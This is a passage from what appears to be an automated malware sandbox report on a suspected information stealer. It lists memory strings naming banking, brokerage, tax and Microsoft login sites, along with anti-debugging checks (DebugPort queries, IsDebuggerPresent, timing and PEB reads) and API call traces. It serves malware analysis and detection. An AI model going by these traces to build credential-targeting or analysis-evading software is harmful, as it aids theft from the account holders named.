                Source: G109m407.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: G109m407.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: G109m407.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: CkszoACLEZHP.exe, 00000006.00000002.4758129802.000000000097E000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4757471775.0000000003225000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2976586825.0000020F69B6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: G109m407.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: G109m407.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: G109m407.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: G109m407.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: G109m407.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: G109m407.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: choice.exe, 00000007.00000002.4760480225.0000000008125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageVMware20,11696428655U6^
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: G109m407.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: G109m407.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: G109m407.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeAPI call chain: ExitProcess graph end nodegraph_0-108818
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E rdtsc 2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417D33 LdrLoadDll,2_2_00417D33
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AC1130 mov eax, dword ptr fs:[00000030h]0_2_00AC1130
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00B03F3D mov eax, dword ptr fs:[00000030h]0_2_00B03F3D
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00D6F0C0 mov eax, dword ptr fs:[00000030h]0_2_00D6F0C0
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00D70790 mov eax, dword ptr fs:[00000030h]0_2_00D70790
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00D70730 mov eax, dword ptr fs:[00000030h]0_2_00D70730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h]2_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h]2_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]2_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]2_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h]2_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h]2_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD8350 mov ecx, dword ptr fs:[00000030h]2_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h]2_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h]2_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h]2_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h]2_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402A0 mov eax, dword ptr fs:[00000030h]2_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h]2_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h]2_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h]2_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h]2_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h]2_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2823B mov eax, dword ptr fs:[00000030h]2_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF61C3 mov eax, dword ptr fs:[00000030h]2_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]2_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D061E5 mov eax, dword ptr fs:[00000030h]2_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C601F8 mov eax, dword ptr fs:[00000030h]2_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C70185 mov eax, dword ptr fs:[00000030h]2_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC188 mov eax, dword ptr fs:[00000030h]2_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4180 mov eax, dword ptr fs:[00000030h]2_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB019F mov eax, dword ptr fs:[00000030h]2_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A197 mov eax, dword ptr fs:[00000030h]2_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov ecx, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC4144 mov eax, dword ptr fs:[00000030h]2_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C156 mov eax, dword ptr fs:[00000030h]2_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC8158 mov eax, dword ptr fs:[00000030h]2_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36154 mov eax, dword ptr fs:[00000030h]2_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov eax, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE10E mov ecx, dword ptr fs:[00000030h]2_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov ecx, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA118 mov eax, dword ptr fs:[00000030h]2_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF0115 mov eax, dword ptr fs:[00000030h]2_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60124 mov eax, dword ptr fs:[00000030h]2_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB20DE mov eax, dword ptr fs:[00000030h]2_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C380E9 mov eax, dword ptr fs:[00000030h]2_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB60E0 mov eax, dword ptr fs:[00000030h]2_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]2_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C720F0 mov ecx, dword ptr fs:[00000030h]2_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3208A mov eax, dword ptr fs:[00000030h]2_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC80A8 mov eax, dword ptr fs:[00000030h]2_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov eax, dword ptr fs:[00000030h]2_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]2_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32050 mov eax, dword ptr fs:[00000030h]2_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB6050 mov eax, dword ptr fs:[00000030h]2_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C073 mov eax, dword ptr fs:[00000030h]2_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4000 mov ecx, dword ptr fs:[00000030h]2_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD2000 mov eax, dword ptr fs:[00000030h]2_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E016 mov eax, dword ptr fs:[00000030h]2_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A020 mov eax, dword ptr fs:[00000030h]2_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C020 mov eax, dword ptr fs:[00000030h]2_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6030 mov eax, dword ptr fs:[00000030h]2_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]2_2_03C3C7C0
